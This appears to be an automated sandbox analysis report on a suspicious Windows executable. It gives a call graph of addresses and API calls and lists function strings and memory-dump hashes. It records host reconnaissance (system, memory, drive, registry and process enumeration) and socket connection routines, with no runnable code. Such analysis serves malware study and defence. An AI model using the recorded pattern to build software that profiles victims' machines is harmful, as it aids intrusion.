83032->83033 83033->83027 83033->83028 83033->83032 83034 bb9280 vfprintf 83033->83034 83033->83035 83034->83033 83035->83025 83036->83025 83037->83027 83038->83031 83476 8e4720 83480 8e4728 83476->83480 83477 8e4733 83479 8e4774 83480->83477 83487 8e476c 83480->83487 83488 8e5540 6 API calls 83480->83488 83482 8e482e 83482->83487 83489 8e9270 83482->83489 83484 8e4860 83494 8e4950 83484->83494 83486 8e4878 83487->83486 83502 8e30a0 6 API calls 83487->83502 83488->83482 83503 8ea440 83489->83503 83491 8e9297 83493 8e92ab 83491->83493 83533 8ebbe0 6 API calls 83491->83533 83493->83484 83495 8e4966 83494->83495 83499 8e49c5 83495->83499 83501 8e49b9 83495->83501 83535 8eb590 if_nametoindex if_indextoname 83495->83535 83497 8e4aa0 gethostname 83497->83499 83497->83501 83498 8e4a3e 83498->83499 83536 8ebbe0 6 API calls 83498->83536 83499->83487 83501->83497 83501->83499 83502->83479 83504 8ea46b 83503->83504 83505 8ea4db 83504->83505 83534 8eb830 if_nametoindex if_indextoname 83504->83534 83506 8eaa03 RegOpenKeyExA 83505->83506 83520 8ead14 83505->83520 83507 8eaa27 RegQueryValueExA 83506->83507 83508 8eab70 RegOpenKeyExA 83506->83508 83509 8eaacc RegQueryValueExA 83507->83509 83510 8eaa71 83507->83510 83511 8eac34 RegOpenKeyExA 83508->83511 83512 8eab90 83508->83512 83515 8eab0e 83509->83515 83516 8eab66 RegCloseKey 83509->83516 83510->83509 83519 8eaa85 RegQueryValueExA 83510->83519 83513 8eacf8 RegOpenKeyExA 83511->83513 83514 8eac54 83511->83514 83512->83511 83517 8ead56 RegEnumKeyExA 83513->83517 83513->83520 83514->83513 83515->83516 83523 8eab1e RegQueryValueExA 83515->83523 83516->83508 83518 8ead9b 83517->83518 83517->83520 83521 8eae16 RegOpenKeyExA 83518->83521 83522 8eaab3 83519->83522 83520->83491 83524 8eaddf RegEnumKeyExA 83521->83524 83525 8eae34 RegQueryValueExA 83521->83525 83522->83509 83528 8eab4c 83523->83528 83524->83520 83524->83521 83526 8eaf43 RegQueryValueExA 83525->83526 83532 8eadaa 83525->83532 83527 8eb052 RegQueryValueExA 83526->83527 83526->83532 83530 8eadc7 RegCloseKey 83527->83530 83527->83532 83528->83516 83530->83524 83531 8eafa0 RegQueryValueExA 83531->83532 83532->83526 83532->83527 83532->83530 83532->83531 83533->83493 83534->83505 83535->83498 83536->83501 83537 d07460 83538 d07492 83537->83538 83539 d0749e 83538->83539 83542 bb8f70 83538->83542 83541 d074a7 83549 bb8e90 _open 83542->83549 83544 bb8f82 83545 bb8e90 _open 83544->83545 83546 bb8fa2 83545->83546 83547 bb8f70 _open 83546->83547 83548 bb8fb8 83547->83548 83548->83541 83550 bb8eba 83549->83550 83550->83544 83551 83f7b0 83552 83f97a 83551->83552 83555 83f7c3 83551->83555 83554 83f932 83578 86cd80 83554->83578 83555->83552 83574 840150 83555->83574 83557 83f987 83599 881390 83557->83599 83558 83f942 83558->83557 83560 881390 _open 83558->83560 83559 83f854 83559->83552 83559->83554 83603 83fec0 12 API calls 83559->83603 83560->83558 83564 881390 _open 83565 83f9a0 83564->83565 83566 881390 _open 83565->83566 83567 83f9ac 83566->83567 83568 83f9bb WSACloseEvent 83567->83568 83569 8375a0 _open 83568->83569 83570 83f9df 83569->83570 83571 8375a0 _open 83570->83571 83572 83fa12 83571->83572 83573 8375a0 _open 83572->83573 83573->83552 83575 840167 83574->83575 83577 8401c3 83575->83577 83604 8430d0 _open 83575->83604 83577->83559 83579 86d0f1 83578->83579 83587 86cd9a 83578->83587 83579->83558 83580 86d0e5 83581 881390 _open 83580->83581 83581->83579 83582 86d0b4 83612 84f6c0 12 API calls 83582->83612 83586 86d064 83586->83582 83611 86de00 7 API calls 83586->83611 83587->83580 83592 86ce6b 83587->83592 83605 86dc30 7 API calls 83587->83605 83591 86d016 83591->83586 83610 86de00 7 API calls 83591->83610 83592->83586 83597 86cf4b 83592->83597 83606 86dc30 7 API calls 83592->83606 83593 86df30 _open 83593->83597 83594 86d018 83609 847380 _open 83594->83609 83596 846fa0 4 API calls 83596->83597 83597->83591 83597->83593 83597->83594 83597->83596 83607 86e130 7 API calls 83597->83607 83608 847380 _open 83597->83608 83600 83f98d 83599->83600 83602 88139d 83599->83602 83600->83564 83601 8375a0 _open 83601->83600 83602->83601 83603->83559 83604->83577 83605->83587 83606->83592 83607->83597 83608->83597 83609->83591 83610->83591 83611->83586 83612->83580 83039 8331d7 83042 8331f4 83039->83042 83040 833200 83041 8332dc CloseHandle 83041->83040 83042->83040 83042->83041 83043 832f17 83051 832f2c 83043->83051 83044 8331d3 83045 832fb3 RegOpenKeyExA 83045->83051 83046 83315c RegEnumKeyExA 83047 8331b2 RegCloseKey 83046->83047 83046->83051 83047->83051 83048 833046 RegOpenKeyExA 83049 833089 RegQueryValueExA 83048->83049 83048->83051 83050 83313b RegCloseKey 83049->83050 83049->83051 83050->83051 83051->83044 83051->83045 83051->83046 83051->83048 83051->83050 83052 74403d1 83053 744036e 83052->83053 83054 744043e Process32FirstW 83053->83054 83055 744045d 83054->83055 83056 868b50 83057 868b6b 83056->83057 83085 868be6 83056->83085 83058 868bf3 83057->83058 83059 868b8f 83057->83059 83057->83085 83089 86a550 83058->83089 83160 846e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 83059->83160 83063 868cd9 SleepEx getsockopt 83065 868d18 83063->83065 83064 868e85 83070 868eae 83064->83070 83064->83085 83166 842a00 _open 83064->83166 83069 868d43 83065->83069 83071 868cb2 83065->83071 83066 86a150 2 API calls 83077 868dff 83066->83077 83067 868c35 83148 86a150 83067->83148 83068 868c1f connect 83068->83067 83076 86a150 2 API calls 83069->83076 83070->83085 83167 8378b0 closesocket 83070->83167 83071->83064 83071->83066 83071->83085 83075 868bb5 83075->83085 83162 8750a0 _open 83075->83162 83076->83075 83077->83064 83164 84d090 _open 83077->83164 83078 868c8b 83080 868dc8 83078->83080 83081 868ba1 83078->83081 83163 86b100 _open 83080->83163 83081->83063 83081->83071 83081->83075 83084 868e67 83165 874fd0 _open 83084->83165 83090 86a575 83089->83090 83092 86a597 83090->83092 83171 8375e0 83090->83171 83139 86a6d9 83092->83139 83183 86ef30 83092->83183 83094 86a709 83096 8378b0 2 API calls 83094->83096 83103 86a713 83094->83103 83096->83103 83097 868bfc 83097->83067 83097->83068 83097->83071 83097->83085 83099 86a7e5 83104 86a811 setsockopt 83099->83104 83109 86a87c 83099->83109 83119 86a8ee 83099->83119 83101 86a641 83101->83099 83197 874fd0 _open 83101->83197 83103->83097 83196 8750a0 _open 83103->83196 83104->83109 83112 86a83b 83104->83112 83105 86a69b 83193 84d090 _open 83105->83193 83107 86a6c9 83194 874f40 _open 83107->83194 83109->83119 83200 86b1e0 _open 83109->83200 83112->83109 83198 84d090 _open 83112->83198 83113 86af56 83115 86af5d 83113->83115 83113->83139 83115->83103 83118 86a150 2 API calls 83115->83118 83116 86a86d 83199 874fd0 _open 83116->83199 83118->83103 83120 86abb9 83119->83120 83122 86ae32 83119->83122 83123 86acb8 83119->83123 83133 86af33 83119->83133 83119->83139 83141 86abe1 83119->83141 83125 86ad45 83120->83125 83129 86ade6 83120->83129 83120->83141 83202 866be0 16 API calls 83120->83202 83121 86b056 83211 84d090 _open 83121->83211 83122->83120 83208 874fd0 _open 83122->83208 83123->83120 83128 86acdc 83123->83128 83123->83139 83124 86af03 83124->83133 83209 874fd0 _open 83124->83209 83125->83129 83132 86ad5f 83125->83132 83201 84d090 _open 83128->83201 83206 84d090 _open 83129->83206 83203 8820d0 _open 83132->83203 83192 8967e0 ioctlsocket 83133->83192 83134 86b07b 83212 874f40 _open 83134->83212 83137 86ad7b 83142 86adb7 83137->83142 83204 874fd0 _open 83137->83204 83139->83094 83139->83103 83195 842a00 _open 83139->83195 83141->83121 83141->83124 83141->83139 83210 874fd0 _open 83141->83210 83205 883030 _open 83142->83205 83144 86ad01 83207 874f40 _open 83144->83207 83149 868c4d 83148->83149 83150 86a15f 83148->83150 83149->83078 83161 8750a0 _open 83149->83161 83150->83149 83151 86a181 getsockname 83150->83151 83152 86a1f7 83151->83152 83153 86a1d0 83151->83153 83154 86ef30 _open 83152->83154 83219 84d090 _open 83153->83219 83158 86a20f 83154->83158 83156 86a1eb 83221 874f40 _open 83156->83221 83158->83149 83220 84d090 _open 83158->83220 83160->83081 83161->83078 83162->83085 83163->83071 83164->83084 83165->83064 83166->83070 83168 8378c5 83167->83168 83170 8378d7 83167->83170 83222 8372a0 _open 83168->83222 83170->83085 83172 837607 socket 83171->83172 83173 8375ef 83171->83173 83174 83762b 83172->83174 83175 83763a 83172->83175 83173->83172 83176 837643 83173->83176 83177 837601 83173->83177 83213 8372a0 _open 83174->83213 83175->83092 83214 8372a0 _open 83176->83214 83177->83172 83180 837654 83215 83cb20 _open 83180->83215 83182 837674 83182->83092 83184 86ef47 83183->83184 83185 86efa8 83183->83185 83186 86ef81 83184->83186 83189 86ef4c 83184->83189 83188 86a63a 83185->83188 83218 83c960 _open 83185->83218 83217 893d10 _open 83186->83217 83188->83101 83188->83105 83189->83188 83216 893d10 _open 83189->83216 83192->83113 83193->83107 83194->83139 83195->83094 83196->83097 83197->83099 83198->83116 83199->83109 83200->83119 83201->83144 83202->83125 83203->83137 83204->83142 83205->83141 83206->83144 83207->83139 83208->83120 83209->83133 83210->83141 83211->83134 83212->83139 83213->83175 83214->83180 83215->83182 83216->83188 83217->83188 83218->83188 83219->83156 83220->83156 83221->83149 83222->83170 83613 866ab0 83614 866ad5 83613->83614 83615 866bb4 83614->83615 83616 846fa0 4 API calls 83614->83616 83617 8e5ed0 11 API calls 83615->83617 83619 866b54 83616->83619 83618 866ba9 83617->83618 83619->83615 83619->83618 83620 866b5d 83619->83620 83620->83618 83622 8e5ed0 83620->83622 83625 8e5a50 83622->83625 83624 8e5ee5 83624->83620 83626 8e5a58 83625->83626 83630 8e5ea0 83625->83630 83627 8e5b50 83626->83627 83639 8e5a99 83626->83639 83640 8e5b88 83626->83640 83631 8e5b7a 83627->83631 83632 8e5eb4 83627->83632 83627->83640 83628 8e5e96 83667 8f9480 6 API calls 83628->83667 83630->83624 83650 8e70a0 83631->83650 83633 8e6f10 7 API calls 83632->83633 83636 8e5ec2 83633->83636 83636->83636 83637 8e5be2 __WSAFDIsSet 83637->83639 83638 8e5da1 __WSAFDIsSet 83644 8e5cae 83638->83644 83639->83637 83639->83640 83642 8e70a0 7 API calls 83639->83642 83657 8e6f10 83639->83657 83640->83644 83665 8e5ef0 socket ioctlsocket setsockopt connect getsockname 83640->83665 83642->83639 83644->83628 83644->83638 83646 8fa920 83644->83646 83666 8f9320 6 API calls 83644->83666 83647 8fa944 83646->83647 83648 8fa977 send 83647->83648 83649 8fa94b 83647->83649 83648->83644 83649->83644 83654 8e70ae 83650->83654 83652 8e71a7 83652->83640 83653 8e717f 83653->83652 83681 8f9320 6 API calls 83653->83681 83654->83652 83654->83653 83668 8fa8c0 83654->83668 83672 8e71c0 83654->83672 83658 8e6f35 83657->83658 83664 8e7019 83658->83664 83709 8fa870 83658->83709 83661 8e6f4e 83662 8e701d 83661->83662 83663 8e71c0 5 API calls 83661->83663 83661->83664 83662->83639 83663->83661 83664->83662 83713 8f9320 6 API calls 83664->83713 83665->83640 83666->83644 83667->83630 83669 8fa8e6 83668->83669 83670 8fa903 recvfrom 83668->83670 83669->83670 83671 8fa8ed 83669->83671 83670->83671 83671->83654 83674 8e71e6 83672->83674 83673 8e71f2 83673->83654 83674->83673 83682 8fbc80 83674->83682 83676 8e734e 83676->83673 83677 8e73c9 83676->83677 83679 8e73e3 83676->83679 83677->83673 83686 8e6050 83677->83686 83679->83673 83692 8e5ef0 socket ioctlsocket setsockopt connect getsockname 83679->83692 83681->83652 83683 8fbca1 83682->83683 83685 8fbcf1 83683->83685 83693 8e5ef0 socket ioctlsocket setsockopt connect getsockname 83683->83693 83685->83676 83687 8e60d9 83686->83687 83694 8faa30 83687->83694 83689 8e62fc 83690 8e6050 5 API calls 83689->83690 83691 8e6506 83689->83691 83690->83691 83691->83673 83692->83673 83693->83685 83695 8faa5f 83694->83695 83696 8fab96 socket 83695->83696 83697 8fab75 83695->83697 83699 8fab04 83695->83699 83696->83697 83696->83699 83698 8fabd0 ioctlsocket 83697->83698 83697->83699 83702 8fad2e 83697->83702 83703 8fabef 83698->83703 83699->83689 83700 8fad0a setsockopt 83700->83699 83700->83702 83701 8fada0 connect 83701->83702 83702->83699 83702->83701 83704 8fade1 83702->83704 83703->83699 83703->83700 83703->83702 83704->83699 83706 8faf70 83704->83706 83707 8faf93 getsockname 83706->83707 83708 8faf8d 83706->83708 83707->83708 83708->83699 83710 8fa88c 83709->83710 83711 8fa8aa recv 83709->83711 83710->83711 83712 8fa893 83710->83712 83711->83661 83712->83661 83713->83662 83714 8695b0 83715 8695c8 83714->83715 83717 8695fd 83714->83717 83716 86a150 2 API calls 83715->83716 83715->83717 83716->83717 83718 8329ff FindFirstFileA 83719 832a31 83718->83719 83720 832a5c RegOpenKeyExA 83719->83720 83721 832a93 83720->83721 83722 832ade CharUpperA 83721->83722 83723 832b0a 83722->83723 83724 832bf9 QueryFullProcessImageNameA 83723->83724 83725 832c3b CloseHandle 83724->83725 83727 832c64 83725->83727 83726 832df1 CloseHandle 83728 832e23 83726->83728 83727->83726 83223 833d5e 83224 833d30 83223->83224 83224->83223 83225 833d90 83224->83225 83229 840ab0 83224->83229 83232 83fcb0 12 API calls 83225->83232 83228 833dc1 83233 8405b0 83229->83233 83232->83228 83234 8407c7 83233->83234 83242 8405bd 83233->83242 83234->83224 83235 84066a 83252 86dec0 83235->83252 83239 84067b 83245 8406f0 83239->83245 83248 8407ce 83239->83248 83259 8473b0 _open 83239->83259 83242->83234 83242->83235 83242->83248 83257 8403c0 _open 83242->83257 83258 847450 _open 83242->83258 83243 840707 WSAEventSelect 83243->83245 83243->83248 83244 8407ef 83244->83248 83250 840847 83244->83250 83261 846fa0 83244->83261 83245->83243 83245->83244 83247 8376a0 2 API calls 83245->83247 83247->83245 83260 847380 _open 83248->83260 83249 8409e8 WSAEnumNetworkEvents 83249->83250 83251 8409d0 WSAEventSelect 83249->83251 83250->83248 83250->83249 83250->83251 83251->83249 83251->83250 83253 86df1e 83252->83253 83254 86dece 83252->83254 83269 86df30 83254->83269 83256 86def9 83256->83239 83257->83242 83258->83242 83259->83239 83260->83234 83262 846feb 83261->83262 83263 846fd4 83261->83263 83262->83250 83263->83262 83264 847207 select 83263->83264 83264->83262 83268 847233 83264->83268 83265 84726b __WSAFDIsSet 83266 84729a __WSAFDIsSet 83265->83266 83265->83268 83267 8472ba __WSAFDIsSet 83266->83267 83266->83268 83267->83268 83268->83262 83268->83265 83268->83266 83268->83267 83272 86df44 83269->83272 83270 86dfb5 83270->83256 83272->83270 83273 86dfb9 83272->83273 83275 847450 _open 83272->83275 83276 847380 _open 83273->83276 83275->83272 83276->83270 83729 841139 83754 86baa0 83729->83754 83731 841148 83732 841512 83731->83732 83736 841161 83731->83736 83737 841527 83732->83737 83758 83fec0 12 API calls 83732->83758 83733 840f69 83735 841f58 83733->83735 83739 841fb0 83733->83739 83743 840f00 83733->83743 83738 840150 _open 83735->83738 83736->83733 83740 840150 _open 83736->83740 83737->83733 83759 8422d0 12 API calls 83737->83759 83749 841f61 83738->83749 83739->83743 83761 844940 _open 83739->83761 83740->83733 83744 840150 _open 83743->83744 83753 840f21 83743->83753 83744->83753 83745 841fa6 83745->83743 83746 84208a 83745->83746 83748 8375a0 _open 83745->83748 83745->83753 83762 843900 _open 83746->83762 83750 842057 83748->83750 83749->83745 83760 86d4d0 7 API calls 83749->83760 83751 8375a0 _open 83750->83751 83751->83746 83755 86bb60 83754->83755 83757 86bac7 83754->83757 83755->83731 83757->83755 83763 8505b0 _open 83757->83763 83758->83737 83759->83733 83760->83745 83761->83745 83762->83743 83763->83755 83277 83255d 83320 bb9f70 83277->83320 83280 832589 83281 8325a0 GlobalMemoryStatusEx 83280->83281 83282 8325ec 83281->83282 83322 7400239 83282->83322 83326 74001bb 83282->83326 83330 7400138 83282->83330 83336 74000b8 83282->83336 83342 7400176 83282->83342 83348 7400036 83282->83348 83354 7400070 83282->83354 83360 74000f3 83282->83360 83366 740002e 83282->83366 83372 74001f0 83282->83372 83376 74001a6 83282->83376 83380 7400228 83282->83380 83384 7400325 83282->83384 83388 74002a5 83282->83388 83392 7400020 83282->83392 83398 74000a2 83282->83398 83404 740011b 83282->83404 83410 740019d 83282->83410 83414 74000d8 83282->83414 83420 7400059 83282->83420 83426 740000b 83282->83426 83432 74001d7 83282->83432 83438 7400309 83282->83438 83442 74000c9 83282->83442 83448 7400205 83282->83448 83452 74002c6 83282->83452 83456 7400000 83282->83456 83462 7400081 83282->83462 83321 83256c GetSystemInfo 83320->83321 83321->83280 83324 74002b9 83322->83324 83323 7400330 GetLogicalDrives 83323->83324 83324->83323 83325 740033f 83324->83325 83327 74001c1 83326->83327 83328 7400330 GetLogicalDrives 83327->83328 83329 740033f 83327->83329 83328->83327 83331 740016e 83330->83331 83332 740019d GetLogicalDrives 83331->83332 83334 7400190 83331->83334 83332->83334 83333 7400330 GetLogicalDrives 83333->83334 83334->83333 83335 740033f 83334->83335 83337 74000d0 83336->83337 83338 740019d GetLogicalDrives 83337->83338 83340 7400190 83337->83340 83338->83340 83339 7400330 GetLogicalDrives 83339->83340 83340->83339 83341 740033f 83340->83341 83343 740017f 83342->83343 83344 740019d GetLogicalDrives 83343->83344 83346 7400190 83344->83346 83345 7400330 GetLogicalDrives 83345->83346 83346->83345 83347 740033f 83346->83347 83349 7400052 83348->83349 83350 740019d GetLogicalDrives 83349->83350 83352 7400190 83349->83352 83350->83352 83351 7400330 GetLogicalDrives 83351->83352 83352->83351 83353 740033f 83352->83353 83355 7400078 83354->83355 83356 740019d GetLogicalDrives 83355->83356 83358 7400190 83355->83358 83356->83358 83357 7400330 GetLogicalDrives 83357->83358 83358->83357 83359 740033f 83358->83359 83361 7400103 83360->83361 83362 740019d GetLogicalDrives 83361->83362 83364 7400190 83361->83364 83362->83364 83363 7400330 GetLogicalDrives 83363->83364 83364->83363 83365 740033f 83364->83365 83367 740003a 83366->83367 83368 740019d GetLogicalDrives 83367->83368 83370 7400190 83367->83370 83368->83370 83369 7400330 GetLogicalDrives 83369->83370 83370->83369 83371 740033f 83370->83371 83373 74001fb 83372->83373 83374 7400330 GetLogicalDrives 83373->83374 83375 740033f 83373->83375 83374->83373 83378 74001b0 83376->83378 83377 7400330 GetLogicalDrives 83377->83378 83378->83377 83379 740033f 83378->83379 83381 7400248 83380->83381 83382 7400330 GetLogicalDrives 83381->83382 83383 740033f 83381->83383 83382->83381 83385 7400330 GetLogicalDrives 83384->83385 83386 74002fd 83385->83386 83386->83385 83387 740033f 83386->83387 83390 74002af 83388->83390 83389 7400330 GetLogicalDrives 83389->83390 83390->83389 83391 740033f 83390->83391 83393 740003f 83392->83393 83394 740019d GetLogicalDrives 83393->83394 83396 7400190 83393->83396 83394->83396 83395 7400330 GetLogicalDrives 83395->83396 83396->83395 83397 740033f 83396->83397 83399 74000a8 83398->83399 83400 740019d GetLogicalDrives 83399->83400 83401 7400190 83399->83401 83400->83401 83402 7400330 GetLogicalDrives 83401->83402 83403 740033f 83401->83403 83402->83401 83405 740012e 83404->83405 83406 740019d GetLogicalDrives 83405->83406 83407 7400190 83405->83407 83406->83407 83408 7400330 GetLogicalDrives 83407->83408 83409 740033f 83407->83409 83408->83407 83411 74001b0 83410->83411 83412 7400330 GetLogicalDrives 83411->83412 83413 740033f 83411->83413 83412->83411 83415 7400103 83414->83415 83416 740019d GetLogicalDrives 83415->83416 83418 7400190 83415->83418 83416->83418 83417 7400330 GetLogicalDrives 83417->83418 83418->83417 83419 740033f 83418->83419 83421 7400078 83420->83421 83422 740019d GetLogicalDrives 83421->83422 83424 7400190 83421->83424 83422->83424 83423 7400330 GetLogicalDrives 83423->83424 83424->83423 83425 740033f 83424->83425 83427 7400016 83426->83427 83428 740019d GetLogicalDrives 83427->83428 83430 7400190 83427->83430 83428->83430 83429 7400330 GetLogicalDrives 83429->83430 83430->83429 83431 740033f 83430->83431 83433 740017f 83432->83433 83434 740019d GetLogicalDrives 83433->83434 83435 7400190 83433->83435 83434->83435 83436 7400330 GetLogicalDrives 83435->83436 83437 740033f 83435->83437 83436->83435 83440 74002af 83438->83440 83439 7400330 GetLogicalDrives 83439->83440 83440->83439 83441 740033f 83440->83441 83443 74000d0 83442->83443 83444 740019d GetLogicalDrives 83443->83444 83445 7400190 83443->83445 83444->83445 83446 7400330 GetLogicalDrives 83445->83446 83447 740033f 83445->83447 83446->83445 83449 74001c6 83448->83449 83450 7400330 GetLogicalDrives 83449->83450 83451 740033f 83449->83451 83450->83449 83453 74002fd 83452->83453 83454 7400330 GetLogicalDrives 83453->83454 83455 740033f 83453->83455 83454->83453 83457 7400016 83456->83457 83458 740019d GetLogicalDrives 83457->83458 83460 7400190 83457->83460 83458->83460 83459 7400330 GetLogicalDrives 83459->83460 83460->83459 83461 740033f 83460->83461 83463 7400096 83462->83463 83464 740019d GetLogicalDrives 83463->83464 83466 7400190 83463->83466 83464->83466 83465 7400330 GetLogicalDrives 83465->83466 83466->83465 83467 740033f 83466->83467 83764 cffa30 83765 cffa5a 83764->83765 83766 cffa66 83765->83766 83767 bb8f70 _open 83765->83767 83768 cffa6f 83767->83768 83774 bc12c0 83768->83774 83771 cffaa6 83772 bb8f70 _open 83773 cffaaf 83772->83773 83775 bc12cc 83774->83775 83778 bbe050 83775->83778 83777 bc12fa 83777->83771 83777->83772 83781 bbe09d 83778->83781 83802 bbe503 83778->83802 83779 bbe18e 83779->83777 83780 bbe388 83780->83779 83787 bbeb52 83780->83787 83793 bbe6b9 83780->83793 83780->83802 83807 bbdf60 fgetc 83780->83807 83781->83779 83781->83780 83782 bbdf60 fgetc 83781->83782 83783 bbe243 83781->83783 83781->83802 83782->83781 83783->83779 83803 bbdf60 fgetc 83783->83803 83784 bbfeb6 isxdigit 83784->83802 83786 bbdf60 fgetc 83786->83802 83788 bbe81a 83787->83788 83789 bbeb63 83787->83789 83796 bbe850 83788->83796 83797 bbeb7a 83788->83797 83790 bbf0d5 83789->83790 83789->83797 83808 bbdf60 fgetc 83790->83808 83793->83797 83801 bbe6e4 83793->83801 83793->83802 83796->83779 83805 bbdf60 fgetc 83796->83805 83797->83779 83797->83802 83806 bbdf60 fgetc 83797->83806 83799 bbf0e8 83799->83779 83799->83802 83809 bbdf60 fgetc 83799->83809 83801->83779 83804 bbdf60 fgetc 83801->83804 83802->83779 83802->83784 83802->83786 83803->83783 83804->83802 83805->83802 83806->83802 83807->83780 83808->83799 83809->83799

                                        Executed Functions

                                        Function 0086F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                        • API String ID: 0-1590685507
                                        • Opcode ID: 50502995ce52952c93ae1e95713d320f14802a840babe02606bfbb8c1ee115fb
                                        • Instruction ID: f4fd895272225e06d770c1f1c453b3bef36b498bdc1b241269627aad63ea8d5d
                                        • Opcode Fuzzy Hash: 50502995ce52952c93ae1e95713d320f14802a840babe02606bfbb8c1ee115fb
                                        • Instruction Fuzzy Hash: B2C28B31A043449FD724CF28D585B6ABBE1FF84318F06866DED98DB262D771E984CB81
                                        Function 0083255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1190 83255d-832614 call bb9f70 GetSystemInfo call d01cf0 call d01ee0 GlobalMemoryStatusEx call d01cf0 call d01ee0 1272 832619 call 7400000 1190->1272 1273 832619 call 7400081 1190->1273 1274 832619 call 7400205 1190->1274 1275 832619 call 74002c6 1190->1275 1276 832619 call 7400309 1190->1276 1277 832619 call 74000c9 1190->1277 1278 832619 call 740000b 1190->1278 1279 832619 call 74001d7 1190->1279 1280 832619 call 74000d8 1190->1280 1281 832619 call 7400059 1190->1281 1282 832619 call 740011b 1190->1282 1283 832619 call 740019d 1190->1283 1284 832619 call 7400020 1190->1284 1285 832619 call 74000a2 1190->1285 1286 832619 call 7400325 1190->1286 1287 832619 call 74002a5 1190->1287 1288 832619 call 74001a6 1190->1288 1289 832619 call 7400228 1190->1289 1290 832619 call 740002e 1190->1290 1291 832619 call 74001f0 1190->1291 1292 832619 call 7400070 1190->1292 1293 832619 call 74000f3 1190->1293 1294 832619 call 7400176 1190->1294 1295 832619 call 7400036 1190->1295 1296 832619 call 7400138 1190->1296 1297 832619 call 74000b8 1190->1297 1298 832619 call 7400239 1190->1298 1299 832619 call 74001bb 1190->1299 1201 83261b-832620 1202 832626-832637 call d01af0 1201->1202 1203 83277c-832904 call d01cf0 call d01ee0 KiUserCallbackDispatcher call d01cf0 call d01ee0 call d01cf0 call d01ee0 call bb8e38 call bb8be0 call bb8bd0 FindFirstFileW 1201->1203 1208 832754-83275c 1202->1208 1250 832906-832926 FindNextFileW 1203->1250 1251 832928-83292c 1203->1251 1210 832762-832777 call d01ee0 1208->1210 1211 83263c-83264f GetDriveTypeA 1208->1211 1210->1203 1214 832743-832751 call bb8b98 1211->1214 1215 832655-832685 GetDiskFreeSpaceExA 1211->1215 1214->1208 1215->1214 1217 83268b-83273e call d01dc0 call d01e50 call d01ee0 call d01be0 call d01ee0 call d01be0 call d01ee0 call d00250 1215->1217 1217->1214 1250->1250 1250->1251 1252 832932-83296f call d01cf0 call d01ee0 call bb8e78 1251->1252 1253 83292e 1251->1253 1259 832974-832979 1252->1259 1253->1252 1260 83297b-8329a4 call d01cf0 call d01ee0 1259->1260 1261 8329a9-8329fe call bba2b0 call d01cf0 call d01ee0 1259->1261 1260->1261 1272->1201 1273->1201 1274->1201 1275->1201 1276->1201 1277->1201 1278->1201 1279->1201 1280->1201 1281->1201 1282->1201 1283->1201 1284->1201 1285->1201 1286->1201 1287->1201 1288->1201 1289->1201 1290->1201 1291->1201 1292->1201 1293->1201 1294->1201 1295->1201 1296->1201 1297->1201 1298->1201 1299->1201
                                        APIs
                                        • GetSystemInfo.KERNELBASE ref: 00832579
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 008325CC
                                        • GetDriveTypeA.KERNELBASE ref: 00832647
                                        • GetDiskFreeSpaceExA.KERNELBASE ref: 0083267E
                                        • KiUserCallbackDispatcher.NTDLL ref: 008327E2
                                        • FindFirstFileW.KERNELBASE ref: 008328F8
                                        • FindNextFileW.KERNELBASE ref: 0083291F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
